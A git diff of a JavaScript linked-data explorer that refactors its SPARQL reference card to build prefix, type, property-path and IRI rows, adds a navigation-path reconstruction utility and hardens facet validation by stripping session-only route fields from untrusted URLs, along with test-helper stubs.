@@ -356,6 +382,79 @@ export class TreeRenderer {
     }
   }
 
+  // The body of the SPARQL reference card, as HTML. Split out from
+  // _buildInfoButton so the content can be asserted on without standing up a
+  // Bootstrap popover.
+  _buildInfoRows(subjectValue, predicates) {
+    const esc = (s) => s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;').replace(/"/g, '&quot;');
+    const copyIcon = (value, label) =>
+      `<button class="tree-info-copy-inline" data-copy="${esc(value)}" title="${label}"><i class="bi bi-clipboard"></i></button>`;
+    const row = (label, copyValue, display, copyLabel) =>
+      `<div class="tree-info-row"><span class="tree-info-label">${label}</span>${copyIcon(copyValue, copyLabel)}<code class="tree-info-value">${esc(display)}</code></div>`;
+
+    // Work out everything the card will show before deciding what to declare.
+    // The prefixes needed depend on the finished text — the Path in particular
+    // carries predicates from the whole walked route, not just this resource's
+    // type — so guessing them from the terms that went in gets it wrong.
+    const isVocabularyTerm = Boolean(resolvePrefix(subjectValue));
+    const types = this._typeUris(predicates).map(uri => this._shrinkOrBracket(uri));
+
+    let name = null;
+    let nameCopy = null;
+    let path = null;
+    let iri = null;
+
+    if (isVocabularyTerm) {
+      // The subject is itself an ontology term, so it names a class or
+      // property rather than describing an instance.
+      name = nameCopy = this._shrinkOrBracket(subjectValue);
+    } else {
+      if (types.length) {
+        // What is copied is what is shown, and it matches what the Path binds
+        // — a resource is all of its types, and picking one would depend on
+        // the order the endpoint happened to return them in.
+        name = nameCopy = types.join(', ');
+      }
+      // Null when the resource cannot be named in a query at all — an untyped
+      // blank node. An unusable pattern would be worse than none.
+      path = this._buildPathPattern(subjectValue, predicates);
+      // A blank node has no IRI. Its label is local to this parse, so wrapping
+      // it in angle brackets would offer <b0_b0> — a relative reference to
+      // something else entirely — as though it identified this resource.
+      if (!this._isBlankSubject(subjectValue)) iri = this._asIriRef(subjectValue);
+    }
+
+    const rows = [`<p class="tree-info-intro">Use the following in your SPARQL query</p>`];
+
+    // One declaration per prefix the rows below actually use, so the whole
+    // card can be pasted into an empty query and still parse.
+    for (const prefix of this._prefixesUsedIn([name, path])) {
+      const decl = `PREFIX ${prefix}: <${ns[prefix]}>`;
+      rows.push(row('Prefix', decl, decl, 'Copy prefix declaration'));
+    }
+
+    if (name) rows.push(row('Name', nameCopy, name, 'Copy name'));
+    if (path) rows.push(row('Path', path, path, 'Copy path'));
+    if (iri) rows.push(row('IRI', iri, iri, 'Copy IRI'));
+
+    return [`<div class="tree-info-popover">`, ...rows, `</div>`].join('\n');
+  }
+
+  // The prefixes appearing in the given patterns, in namespace-table order.
+  //
+  // Read back off the finished text rather than tracked while building it,
+  // because the Path's anchor may have been composed during an earlier render
+  // and carried here on the breadcrumb — by then only the string survives.
+  // Every prefix is matched literally against the known table, so an unrelated
+  // colon cannot invent one; at worst a colon inside a bracketed IRI declares
+  // a prefix nothing uses, which is redundant but still valid SPARQL.
+  _prefixesUsedIn(patterns) {
+    const text = patterns.filter(Boolean).join('\n');
+    return Object.keys(ns).filter(prefix =>
+      new RegExp(`(^|[^A-Za-z0-9_-])${prefix}:`).test(text),
+    );
+  }
+
   _buildInfoButton(subjectValue, predicates) {
     const btn = document.createElement('button');
     btn.className = 'tree-info-btn';
@@ -364,40 +463,8 @@ export class TreeRenderer {
     btn.innerHTML = '<i class="bi bi-code-square"></i>';
     const tooltip = new bootstrap.Tooltip(btn, { placement: 'top' });
 
-    const esc = (s) => s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;').replace(/"/g, '&quot;');
-
-    const resolved = resolvePrefix(subjectValue);
-    const types = (predicates.get(RDF_TYPE) || []).map(t => shrink(t.value));
     const title = `<span>SPARQL reference card</span><button class="btn-close tree-info-close" aria-label="Close"></button>`;
-
-    const copyIcon = (value, label) =>
-      `<button class="tree-info-copy-inline" data-copy="${esc(value)}" title="${label}"><i class="bi bi-clipboard"></i></button>`;
-
-    const rows = [
-      `<p class="tree-info-intro">Use the following in your SPARQL query</p>`,
-    ];
-
-    if (resolved) {
-      // Ontology/vocabulary term — PREFIX, Name
-      const prefixDecl = `PREFIX ${resolved.prefix}: <${ns[resolved.prefix]}>`;
-      const prefixedName = `${resolved.prefix}:${resolved.localName}`;
-      rows.push(`<div class="tree-info-row"><span class="tree-info-label">Prefix</span>${copyIcon(prefixDecl, 'Copy prefix declaration')}<code class="tree-info-value">${esc(prefixDecl)}</code></div>`);
-      rows.push(`<div class="tree-info-row"><span class="tree-info-label">Name</span>${copyIcon(prefixedName, 'Copy name')}<code class="tree-info-value">${esc(prefixedName)}</code></div>`);
-    } else {
-      // Data resource — PREFIX (from type), Name (type), IRI
-      if (types.length) {
-        const typeResolved = resolvePrefix((predicates.get(RDF_TYPE) || [])[0]?.value);
-        if (typeResolved) {
-          const typePrefixDecl = `PREFIX ${typeResolved.prefix}: <${ns[typeResolved.prefix]}>`;
-          rows.push(`<div class="tree-info-row"><span class="tree-info-label">Prefix</span>${copyIcon(typePrefixDecl, 'Copy prefix declaration')}<code class="tree-info-value">${esc(typePrefixDecl)}</code></div>`);
-        }
-        rows.push(`<div class="tree-info-row"><span class="tree-info-label">Name</span>${copyIcon(types[0], 'Copy name')}<code class="tree-info-value">${esc(types.join(', '))}</code></div>`);
-      }
-      const iri = `<${subjectValue}>`;
-      rows.push(`<div class="tree-info-row"><span class="tree-info-label">IRI</span>${copyIcon(iri, 'Copy IRI')}<code class="tree-info-value">${esc(iri)}</code></div>`);
-    }
-
-    const lines = [`<div class="tree-info-popover">`, ...rows, `</div>`].join('\n');
+    const lines = this._buildInfoRows(subjectValue, predicates);
 
     const popover = new bootstrap.Popover(btn, {
       title,
@@ -467,19 +534,171 @@ export class TreeRenderer {
     return btn;
   }
 
-  _buildCardBody(predicates, branchAncestors, predicatePath = [], rootContext = null) {
+  // The triple pattern that reaches this resource in a query.
+  //
+  // When the user navigated in from somewhere — say a notice, then a Reviewer
+  // — the breadcrumb knows both the pattern that binds the starting point and
+  // the predicate chain walked since, and the two combine into a property
+  // path: "?notice a epo:Notice ; epo:announcesRole ?reviewer ." That chain is
+  // what makes the resource findable from a query, and it is the thing the
+  // tree alone cannot know (issue #73).
+  //
+  // At the start of an exploration there is no chain, so the best available
+  // binding is the resource's own type — falling back to its IRI when it has
+  // no type. Returns null when neither is available and the resource simply
+  // cannot be referred to in a query.
+  _buildPathPattern(subjectValue, predicates) {
+    // A graph can surface several root cards; the walked chain belongs only
+    // to the subject actually navigated to, not to its siblings.
+    const chain = subjectValue === this._navigatedSubject ? (this._pathFromRoot || []) : [];
+    const anchor = this._rootPattern;
+
+    if (chain.length > 0 && anchor) {
+      const targetVar = this._targetVariable(predicates, anchor);
+      // "?notice a epo:Notice" already states a predicate, so the chain
+      // continues it with ";". An IRI anchor states none, and a leading ";"
+      // there would be a syntax error.
+      const join = anchor.startsWith('?') ? ' ;' : '';
+      return `${anchor}${join} ${this._formatPropertyPath(chain)} ?${targetVar} .`;
+    }
+
+    // No chain: the best available binding is the resource's own type.
+    // Null means the resource cannot be expressed in a query at all.
+    const pattern = this._buildAnchorPattern(subjectValue, predicates);
+    if (!pattern) return null;
+    return pattern.startsWith('?') ? `${pattern} .` : `${pattern} ?predicate ?value .`;
+  }
+
+  // What a click on this element should record about how it was reached: the
+  // predicates walked, which root the walk started from, and the pattern that
+  // binds that root. DataView needs all three to tell a continuous route from
+  // a chain that silently jumped to a different part of the graph.
+  _navigationContext(pathCtx) {
+    if (!pathCtx) return {};
+    return {
+      viaPath: pathCtx.chain,
+      viaRoot: pathCtx.root,
+      viaRootPattern: pathCtx.anchor,
+    };
+  }
+
+  // The pattern that binds a resource to a variable by its type, e.g.
+  // "?notice a epo:Notice". A typed blank node works the same way, since the
+  // pattern matches on the class rather than on identity.
+  //
+  // Every declared type is bound, not one of them. A notice typically carries
+  // several — epo:Notice alongside epo:CompetitionNotice and a mapping-version
+  // class like epo:Notice16 — and the endpoint returns them in no particular
+  // order, so singling one out would both discard what the resource is and
+  // make the pattern depend on the order the triples arrived in.
+  //
+  // Untyped resources have no class to match on. An IRI can still be named
+  // directly; a blank node cannot — its label belongs to this parse alone and
+  // means nothing in a query, so there is no pattern to offer and we say so.
+  _buildAnchorPattern(subjectValue, predicates) {
+    const typeUris = this._typeUris(predicates);
+    if (typeUris.length) {
+      const classes = typeUris.map(uri => this._shrinkOrBracket(uri)).join(', ');
+      return `?${this._variableNameFrom(typeUris)} a ${classes}`;
+    }
+    return this._isBlankSubject(subjectValue) ? null : this._asIriRef(subjectValue);
+  }
+
+  _typeUris(predicates) {
+    return (predicates?.get(RDF_TYPE) || []).map(t => t.value).filter(Boolean);
+  }
+
+  // Blank-node subjects are tracked while indexing, because the subject index
+  // is keyed by bare value and `_:b0` arrives from the parser as "b0_b0" —
+  // indistinguishable from a relative IRI once the term type is dropped.
+  _isBlankSubject(subjectValue) {
+    return this._blankSubjects?.has(subjectValue) ?? false;
+  }
+
+  // The variable the walked chain lands on, named after the resource's type so
+  // the pattern says what it binds — ?contractTerm rather than a bare ?value.
+  // Navigating from a notice to another notice would otherwise bind the same
+  // variable at both ends: "?notice a epo:Notice ; … ?notice ."
+  _targetVariable(predicates, anchor) {
+    const varName = this._variableNameFrom(this._typeUris(predicates));
+    return anchor.startsWith(`?${varName} `) ? `${varName}2` : varName;
+  }
+
+  // A readable variable name for a resource with these types.
+  //
+  // Where several types are present the shortest local name wins, which for
+  // ePO tends to be the general class — ?notice over ?notice16. That is a
+  // legibility preference and nothing more: a SPARQL variable name carries no
+  // meaning, and every type is bound in the pattern regardless, so the choice
+  // cannot change what the query matches.
+  //
+  // A name may only contain letters, digits and underscores, so a local name
+  // carrying a hyphen or a dot would otherwise produce something unparseable.
+  _variableNameFrom(typeUris) {
+    const locals = [].concat(typeUris ?? [])
+      .filter(Boolean)
+      .map(uri => uri.split(/[#/]/).pop())
+      .sort((a, b) => a.length - b.length || a.localeCompare(b));
+
+    const local = (locals[0] || '').replace(/[^A-Za-z0-9_]/g, '_');
+    if (!local || !/^[A-Za-z_]/.test(local)) return 'value';
+    return local.charAt(0).toLowerCase() + local.slice(1);
+  }
+
+  // A URI as it can safely appear in a query — prefixed where that is legal,
+  // bracketed otherwise.
+  //
+  // shrink() matches on namespace and slices the rest off blindly, so a known
+  // namespace is no guarantee of a valid prefixed name: it turns
+  // http://schema.org/foo/bar into "schema:foo/bar". Inside a property path
+  // that reads as a sequence operator, so the pattern parses and quietly means
+  // something other than what it names. A local part outside SAFE_LOCAL_NAME
+  // therefore keeps the full IRI, as does a URI in no known namespace.
+  _shrinkOrBracket(uri) {
+    const shortened = shrink(uri);
+    if (shortened === uri) return this._asIriRef(uri);
+
+    const localPart = shortened.slice(shortened.indexOf(':') + 1);
+    return SAFE_LOCAL_NAME.test(localPart) ? shortened : this._asIriRef(uri);
+  }
+
+  // A URI written as a SPARQL IRIREF.
+  //
+  // Angle brackets alone do not make an arbitrary string usable: IRIREF
+  // excludes <, >, ", {, }, |, ^, `, \ and everything up to and including
+  // space, so <http://purl.org/dc/terms/a b> is a parse error. Those
+  // characters are not legal in an IRI to begin with — data carrying one is
+  // already malformed — so percent-encoding is how the value gets written
+  // down, not a change to what it refers to.
+  _asIriRef(uri) {
+    const encoded = String(uri).replace(
+      IRIREF_FORBIDDEN,
+      c => `%${c.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0')}`,
+    );
+    return `<${encoded}>`;
+  }
+
+  // Format a chain of predicate URIs as a SPARQL property path, e.g.
+  // ["…#announcesRole", "…#playedBy"] → "epo:announcesRole / epo:playedBy".
+  _formatPropertyPath(chain) {
+    return chain.map(uri => this._shrinkOrBracket(uri)).join(' / ');
+  }
+
+  _buildCardBody(predicates, branchAncestors, pathCtx = null) {
     const body = document.createElement('div');
     body.className = 'tree-card-body';
 
     for (const [predValue, objects] of predicates) {
       const [nestable, nonNestable] = this._partitionObjects(objects, branchAncestors);
-      const childPath = [...predicatePath, predValue];
+      const childCtx = pathCtx
+        ? { ...pathCtx, chain: [...pathCtx.chain, predValue] }
+        : null;
 
       for (const obj of nonNestable) {
-        body.appendChild(this._renderPredicateObject(predValue, obj, childPath, rootContext));
+        body.appendChild(this._renderPredicateObject(predValue, obj, childCtx));
       }
       for (const obj of nestable) {
-        body.appendChild(this._renderSubjectTree(obj.value, branchAncestors, predValue, childPath, rootContext));
+        body.appendChild(this._renderSubjectTree(obj.value, branchAncestors, predValue, childCtx));
       }
     }
 
@@ -501,94 +720,22 @@ export class TreeRenderer {
     return [nestable, nonNestable];
   }
 
-  _renderPredicateObject(predValue, object, predicatePath = [], rootContext = null) {
+  _renderPredicateObject(predValue, object, pathCtx = null) {
     const row = document.createElement('div');
     row.className = 'tree-node';
     row.dataset.predicate = predValue;
     row.dataset.objectValue = object.value;
 
+    // No navigation context, for the same reason as the card header: this
+    // links to the predicate's own definition, not to a step on the route.
     const pred = renderTerm({ termType: 'NamedNode', value: predValue });
     pred.classList.add('predicate');
     row.appendChild(pred);
 
     row.appendChild(document.createTextNode(' → '));
-    row.appendChild(renderTerm(object));
-
-    // "Copy path" affordance — the property path from the root to this
-    // leaf value. Hidden until the row is hovered (see CSS).
-    // Skip rdf:type rows — they are classification metadata, not useful query paths.
-    if (predicatePath.length > 0 && predValue !== RDF_TYPE) {
-      row.appendChild(this._buildCopyPathButton(predicatePath, rootContext));
-    }
+    row.appendChild(renderTerm(object, this._navigationContext(pathCtx)));
 
     return row;
-  }
-
-  // Format a predicate-URI chain as a SPARQL property path string,
-  // e.g. ["...#refersToLot", "...#hasPurpose"] →
-  // "epo:refersToLot / epo:hasPurpose". Each URI is shrunk to its
-  // prefixed form when a known namespace matches, else its local name.
-  _formatPropertyPath(predicatePath) {
-    return predicatePath
-      .map(uri => {
-        const shortened = shrink(uri);
-        // shrink() returns the URI unchanged when no known namespace
-        // matches. In that case wrap it in angle brackets so the path
-        // stays valid SPARQL (a bare local name would not be).
-        return shortened !== uri ? shortened : `<${uri}>`;
-      })
-      .join(' / ');
-  }
-
-  // Build a root context object for a given root subject — its shrunk type
-  // and a variable name derived from the type's local name.
-  _buildRootContext(subjectValue) {
-    const predicates = this.subjectIndex.get(subjectValue);
-    const types = predicates?.get(RDF_TYPE) || [];
-    if (types.length > 0) {
-      // Prefer the type with the shortest local name — this picks the most
-      // general/canonical class (e.g. "Notice" over "Notice29" or "ResultNotice").
-      const typeUri = types
-        .map(t => t.value)
-        .sort((a, b) => a.split(/[#/]/).pop().length - b.split(/[#/]/).pop().length)[0];
-      const typeShrunk = shrink(typeUri);
-      const rootType = typeShrunk !== typeUri ? typeShrunk : `<${typeUri}>`;
-      const localName = typeUri.split(/[#/]/).pop();
-      const rootVarName = localName.charAt(0).toLowerCase() + localName.slice(1);
-      return { rootType, rootVarName };
-    }
-    return { rootType: null, rootVarName: 'subject' };
-  }
-
-  // Build a small button that copies a SPARQL triple pattern snippet from
-  // the root to the current node, e.g.:
-  // "?notice a epo:Notice ; epo:refersToLot / epo:hasPurpose / epo:hasMainClassification ?value ."
-  _buildCopyPathButton(predicatePath, rootContext = null) {
-    const path = this._formatPropertyPath(predicatePath);
-    const varName = rootContext?.rootVarName || 'subject';
-    const rootType = rootContext?.rootType || '';
-
-    let snippet;
-    if (rootType) {
-      snippet = `?${varName} a ${rootType} ; ${path} ?value .`;
-    } else {
-      snippet = `?${varName} ${path} ?value .`;
-    }
-
-    const btn = document.createElement('button');
-    btn.className = 'tree-path-copy';
-    btn.setAttribute('aria-label', 'Copy property path');
-    btn.title = snippet;
-    btn.innerHTML = '<i class="bi bi-clipboard"></i>';
-
-    btn.addEventListener('click', async (e) => {
-      e.stopPropagation();
-      const ok = await copyToClipboard(snippet);
-      btn.innerHTML = ok ? '<i class="bi bi-check"></i>' : '<i class="bi bi-x"></i>';
-      setTimeout(() => { btn.innerHTML = '<i class="bi bi-clipboard"></i>'; }, 1500);
-    });
-
-    return btn;
   }
 }
 

--- a/src/js/facets.js
+++ b/src/js/facets.js
@@ -239,6 +239,24 @@ function addUnique(facets, newFacet) {
 
 // ── Validation ──
 
+// Fields recording how a resource was navigated to, attached by tree clicks
+// and read back by DataView to rebuild the property path on the SPARQL
+// reference card. They describe a live exploration and are deliberately left
+// out of shareable URLs, so anything arriving over one is forged.
+//
+// This matters because `viaRootPattern` is a ready-made SPARQL fragment that
+// the card interpolates verbatim and offers for copying. A crafted ?facet=
+// could therefore put a SERVICE clause pointing at an attacker's endpoint in
+// front of a recipient, presented as the app's own suggested query. The other
+// two are less dangerous — path elements are re-rendered through
+// _shrinkOrBracket and come back bracketed — but none of the three has any
+// business crossing this boundary.
+//
+// When route sharing is implemented, it should serialise validated IRIs and
+// type URIs and rebuild the pattern locally. No transported field should ever
+// contain executable SPARQL.
+const SESSION_ONLY_FIELDS = ['viaPath', 'viaRoot', 'viaRootPattern'];
+
 // Boundary validator for facets coming from untrusted sources (URL params,
 // sessionStorage). Returns a cleaned-up copy of the facet or null. The
 // checks are stricter than "has a value field": notice-number values must
@@ -246,6 +264,17 @@ function addUnique(facets, newFacet) {
 // strings, query strings must be non-empty.
 function validateFacet(data) {
   if (!data || typeof data !== 'object' || !data.type) return null;
+
+  // Spreading `data` below preserves fields this validator does not know
+  // about, which is what lets a forged one through. Drop the session-only
+  // ones before anything else looks at them.
+  for (const field of SESSION_ONLY_FIELDS) {
+    if (field in data) {
+      data = { ...data };
+      for (const f of SESSION_ONLY_FIELDS) delete data[f];
+      break;
+    }
+  }
 
   if (data.type === 'notice-number') {
     const normalized = normalize(data.value);

--- a/src/js/tours/reuseGraphTour.js
+++ b/src/js/tours/reuseGraphTour.js
@@ -64,8 +64,9 @@ export function startReuseGraphTour() {
         // an orange play button instead of the plain triangle used in the tree.
         'Use the <span style="color:#000000; font-size:13.6px;">&#9654;&#65038;</span> arrows to expand or collapse nested nodes. ' +
         'The breadcrumb at the top tracks your path — click any step to go back. ' +
-        'The <i class="bi bi-code-square" style="color:#d63384;"></i> button gives you ' +
-        'SPARQL reference info you can copy into your query.' +
+        'The <i class="bi bi-three-dots-vertical"></i> menu on each card and each row ' +
+        'offers a <i class="bi bi-code-square" style="color:#d63384;"></i> SPARQL reference card ' +
+        'you can copy into your query — on a row it tells you how to reach that particular value.' +
         '<br><br><b>Color coding:</b><br>' +
         '<span style="color:#b56217; font-weight:500; text-decoration:underline;">link or property name</span><span style="font-weight:500;"> → </span><br>' +
         '<span style="color:#2a00ff;">"property value"</span>' +

--- a/src/js/tours/reuseGraphTour.js
+++ b/src/js/tours/reuseGraphTour.js
@@ -59,8 +59,13 @@ export function startReuseGraphTour() {
         'Each card is a node in the graph — a notice, an organisation, a contract, or any other entity. ' +
         'The contents of the card show you the node\'s properties and links to other nodes. ' +
         'You can click on any element to dig deeper into the connected data. ' +
-        'Use the <span style="color:#000000; font-size:13.6px;">&#9654;</span> arrows to expand or collapse nested nodes. ' +
-        'The breadcrumb at the top tracks your path — click any step to go back.' +
+        // &#65038; is the text-presentation selector: without it the popover's
+        // font stack falls through to an emoji font and the arrow renders as
+        // an orange play button instead of the plain triangle used in the tree.
+        'Use the <span style="color:#000000; font-size:13.6px;">&#9654;&#65038;</span> arrows to expand or collapse nested nodes. ' +
+        'The breadcrumb at the top tracks your path — click any step to go back. ' +
+        'The <i class="bi bi-code-square" style="color:#d63384;"></i> button gives you ' +
+        'SPARQL reference info you can copy into your query.' +
         '<br><br><b>Color coding:</b><br>' +
         '<span style="color:#b56217; font-weight:500; text-decoration:underline;">link or property name</span><span style="font-weight:500;"> → </span><br>' +
         '<span style="color:#2a00ff;">"property value"</span>' +

--- a/src/js/utils/navigationPath.js
+++ b/src/js/utils/navigationPath.js
@@ -1,0 +1,89 @@
+/*
+ * Copyright 2026 European Union
+ *
+ * Licensed under the EUPL, Version 1.2 or - as soon they will be approved by the European
+ * Commission - subsequent versions of the EUPL (the "Licence"); You may not use this work except in
+ * compliance with the Licence. You may obtain a copy of the Licence at:
+ * https://joinup.ec.europa.eu/software/page/eupl
+ *
+ * Unless required by applicable law or agreed to in writing, software distributed under the Licence
+ * is distributed on an "AS IS" basis, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
+ * or implied. See the Licence for the specific language governing permissions and limitations under
+ * the Licence.
+ */
+
+/**
+ * Reconstruct the route the user walked through the graph, from the
+ * breadcrumb, for the Path row on the SPARQL reference card (issue #73).
+ *
+ * Every tree click records on its facet the predicates it traversed
+ * (`viaPath`), the root subject that walk started from (`viaRoot`), and the
+ * pattern binding that root (`viaRootPattern`) — see TermRenderer.
+ *
+ * Those hops may only be concatenated when they genuinely join up: hop N has
+ * to start at the subject hop N-1 landed on. Two situations break that:
+ *
+ *   - a graph can render several root cards, and a chain walked beneath one
+ *     of them says nothing about the others;
+ *   - a lateral jump (the procedure timeline) replaces the breadcrumb entry
+ *     with one carrying no chain at all.
+ *
+ * Concatenating regardless would produce a pattern that parses cleanly and
+ * asserts a relationship the data never had — the worst kind of wrong, since
+ * nothing downstream can detect it. So a broken join yields no chain, and the
+ * card falls back to binding the resource by its own type.
+ *
+ * @param {Array<object>} breadcrumb - Facets, oldest first. Entry 0 is the search that started it.
+ * @param {number} breadcrumbIndex - Position currently displayed; forward history beyond it is ignored.
+ * @returns {{chain: string[], anchor: string|null}} Predicate URIs walked, and the pattern they hang off.
+ */
+export function navigationPath(breadcrumb, breadcrumbIndex) {
+  const crumbs = Array.isArray(breadcrumb) ? breadcrumb : [];
+  const walked = crumbs.slice(1, breadcrumbIndex + 1);
+
+  const chain = [];
+  let anchor = null;
+  let expectedRoot = null;
+
+  for (const facet of walked) {
+    if (!isWalkedHop(facet)) return noPath();
+    if (expectedRoot !== null && facet.viaRoot !== expectedRoot) return noPath();
+
+    if (anchor === null) anchor = facet.viaRootPattern;
+    chain.push(...facet.viaPath);
+    expectedRoot = facet.term?.value ?? null;
+  }
+
+  return anchor ? { chain, anchor } : noPath();
+}
+
+// A fresh object each time rather than a shared constant: freezing the outer
+// object would still leave one mutable `chain` array shared by every caller.
+function noPath() {
+  return { chain: [], anchor: null };
+}
+
+/**
+ * Whether a breadcrumb entry carries a usable record of how it was reached.
+ *
+ * The shapes are checked rather than assumed. A facet is a plain object that
+ * has been through validateFacet(), which spreads unknown fields without
+ * inspecting them — so a `viaPath` that is a string rather than an array would
+ * spread into its individual characters and yield a path of single letters,
+ * and a non-string `viaRootPattern` would throw when the pattern is assembled.
+ * Neither can happen from this app's own writes, but nothing here should
+ * depend on that: the cost of checking is a few comparisons, and the failure
+ * mode without it is a plausible-looking query built from nonsense.
+ */
+function isWalkedHop(facet) {
+  if (!facet || typeof facet !== 'object') return false;
+  if (!isNonEmptyString(facet.viaRoot)) return false;
+  if (!isNonEmptyString(facet.viaRootPattern)) return false;
+  return Array.isArray(facet.viaPath)
+    && facet.viaPath.length > 0
+    && facet.viaPath.every(isNonEmptyString);
+}
+
+function isNonEmptyString(value) {
+  return typeof value === 'string' && value.length > 0;
+}

--- a/src/js/utils/toast.js
+++ b/src/js/utils/toast.js
@@ -46,7 +46,7 @@ let lastVariantClasses = [];
  *     to `'success'`, which leaves the toast in its base (plain)
  *     styling.
  */
-export function showToast(title, body, { variant = 'success' } = {}) {
+export function showToast(title, body, { variant = 'success', detail = null } = {}) {
   const toastEl = document.getElementById(TOAST_ID);
   const titleEl = document.getElementById(TOAST_TITLE_ID);
   const bodyEl = document.getElementById(TOAST_BODY_ID);
@@ -65,6 +65,17 @@ export function showToast(title, body, { variant = 'success' } = {}) {
 
   titleEl.textContent = title;
   bodyEl.textContent = body;
+
+  // A value the message is about — a copied URI, an identifier — set on its
+  // own element rather than interpolated into the prose, where it reads as
+  // part of the sentence and a long URI runs the two together. Still
+  // textContent: this is data, and the toast renders no markup.
+  if (detail) {
+    const detailEl = document.createElement('code');
+    detailEl.className = 'toast-detail';
+    detailEl.textContent = detail;
+    bodyEl.appendChild(detailEl);
+  }
 
   // Strip any variant classes left over from a previous call before
   // applying the new ones.

--- a/test/ExplorerController.test.js
+++ b/test/ExplorerController.test.js
@@ -746,3 +746,29 @@ test('ePO 3 fallback: not attempted for a non-notice (query) facet even when emp
 function resetShimsExceptLocation() {
   globalThis.sessionStorage.clear();
 }
+
+// ── route metadata on live navigation ───────────────────────────────
+//
+// Tree clicks attach viaPath / viaRoot / viaRootPattern to the facet so the
+// SPARQL reference card can rebuild the property path. validateFacet strips
+// those at the URL and sessionStorage boundaries, because anything arriving
+// over one is forged — this checks that the stripping did not also cut the
+// legitimate path, which does not go through that validator.
+
+test('explore preserves the route metadata a tree click attaches', async () => {
+  const controller = new ExplorerController();
+  await controller.search(createPublicationNumberFacet('00100333-2025')).catch(() => {});
+
+  await controller.explore({
+    type: 'named-node',
+    term: { termType: 'NamedNode', value: 'http://data.europa.eu/a4g/resource/id_x_Reviewer' },
+    viaPath: ['http://data.europa.eu/a4g/ontology#announcesRole'],
+    viaRoot: 'http://data.europa.eu/a4g/resource/id_x_Notice',
+    viaRootPattern: '?notice a epo:Notice',
+  }).catch(() => {});
+
+  const current = controller.currentFacet;
+  assert.deepEqual(current.viaPath, ['http://data.europa.eu/a4g/ontology#announcesRole']);
+  assert.equal(current.viaRoot, 'http://data.europa.eu/a4g/resource/id_x_Notice');
+  assert.equal(current.viaRootPattern, '?notice a epo:Notice');
+});

--- a/test/_helpers.js
+++ b/test/_helpers.js
@@ -155,6 +155,16 @@ class StubElement {
   }
   replaceChildren(...children) { this._children = children; }
 
+  /** Detach from the parent, as Element.remove does. */
+  remove() {
+    const siblings = this._parent?._children;
+    if (siblings) {
+      const at = siblings.indexOf(this);
+      if (at !== -1) siblings.splice(at, 1);
+    }
+    this._parent = null;
+  }
+
   // Simple selectors only — ".class", "#id" or "tag" — matched against the
   // element subtree. Combinators (spaces, ">", ":scope") are not supported and
   // return nothing, as before.
@@ -221,6 +231,19 @@ if (typeof globalThis.requestAnimationFrame === 'undefined') {
 
 if (typeof globalThis.document === 'undefined') {
   globalThis.document = {
+    // Code that closes something when the click lands elsewhere registers
+    // here. The handlers are kept so a test can see one was removed again.
+    _listeners: new Map(),
+    addEventListener(event, handler) {
+      if (!this._listeners.has(event)) this._listeners.set(event, []);
+      this._listeners.get(event).push(handler);
+    },
+    removeEventListener(event, handler) {
+      const handlers = this._listeners.get(event);
+      if (!handlers) return;
+      const at = handlers.indexOf(handler);
+      if (at !== -1) handlers.splice(at, 1);
+    },
     getElementById(id) {
       if (!_stubElements.has(id)) _stubElements.set(id, new StubElement(id));
       return _stubElements.get(id);
@@ -268,16 +291,53 @@ if (typeof globalThis.bootstrap === 'undefined') {
     disable() { this.enabled = false; }
     dispose() {}
   }
+  // Faithful on the two points a leak or a use-after-dispose turns on.
+  //
+  // Bootstrap keeps every instance in a strong module-level Map and only
+  // dispose() removes it, so `live` stands in for that: anything left in it
+  // is an instance the page is still holding. And dispose() nulls every own
+  // property of the instance, so a later show() reads from null and throws —
+  // which is what happens if a closure keeps pointing at a disposed popover.
   class Popover {
+    static live = new Set();
     constructor(el, options = {}) {
       this.el = el;
       this.options = options;
       this.tip = null;
+      this.disposed = false;
       if (el) el._popover = this;
+      Popover.live.add(this);
     }
-    show() { this.shown = true; }
-    hide() { this.shown = false; }
-    dispose() {}
+    show() {
+      if (this.disposed) {
+        throw new TypeError("Cannot read properties of null (reading 'style')");
+      }
+      this.shown = true;
+      // Bootstrap builds the tip and announces it. TreeRenderer wires the
+      // card's own close button inside that handler, so without the event
+      // that button is never reachable from a test.
+      this.tip = document.createElement('div');
+      const close = document.createElement('button');
+      close.className = 'tree-info-close';
+      this.tip.appendChild(close);
+      for (const handler of this.el?._listeners?.get('shown.bs.popover') || []) handler();
+    }
+    hide() {
+      this.shown = false;
+      this.tip = null;
+      // Bootstrap's hide() is animated unless told otherwise, and an animated
+      // hide finishes well after it returns. Disposing before then leaves the
+      // transition reading from an instance dispose() has already emptied,
+      // which in a browser is `Cannot convert undefined or null to object`.
+      this.hiding = this.options.animation !== false;
+    }
+    dispose() {
+      if (this.hiding) {
+        throw new Error('dispose() during an animated hide — the transition has not finished');
+      }
+      this.disposed = true;
+      Popover.live.delete(this);
+    }
   }
   globalThis.bootstrap = { Tooltip, Popover, Tab: class { constructor(el) { this.el = el; } show() {} } };
 }
@@ -291,6 +351,8 @@ export function resetShims() {
   globalThis.sessionStorage.clear();
   setLocation(DEFAULT_HREF);
   _stubElements.clear();
+  globalThis.bootstrap?.Popover?.live?.clear();
+  globalThis.document?._listeners?.clear();
 }
 
 export { setLocation };

--- a/test/_helpers.js
+++ b/test/_helpers.js
@@ -107,6 +107,7 @@ class StubElement {
     this.classList = new StubClassList();
     this._children = [];
     this._listeners = new Map();
+    this._attributes = new Map();
     this._innerHTML = '';
     this.textContent = '';
     this.disabled = false;
@@ -184,8 +185,12 @@ class StubElement {
     if (!this._listeners.has(event)) this._listeners.set(event, []);
     this._listeners.get(event).push(handler);
   }
-  removeAttribute() {}
-  setAttribute() {}
+  // Attributes are stored rather than discarded: some behaviour is carried by
+  // them alone — a Bootstrap data API hook, an aria state — and a test cannot
+  // see it if setting one is a no-op.
+  removeAttribute(name) { this._attributes.delete(name); }
+  setAttribute(name, value) { this._attributes.set(name, String(value)); }
+  getAttribute(name) { return this._attributes.has(name) ? this._attributes.get(name) : null; }
   click() {}
   get parentElement() { return this._parent ?? null; }
   get offsetParent() { return this; }

--- a/test/_helpers.js
+++ b/test/_helpers.js
@@ -73,10 +73,17 @@ if (typeof globalThis.window === 'undefined') {
 // reflow anything. Tests that need to inspect what was rendered should
 // use them as opaque sinks ("did this method call appendChild N times").
 //
+// Supported traversal:
+//   - querySelector / querySelectorAll take a single simple selector
+//     (".class", "#id", "tag") and walk the subtree. Combinators — spaces,
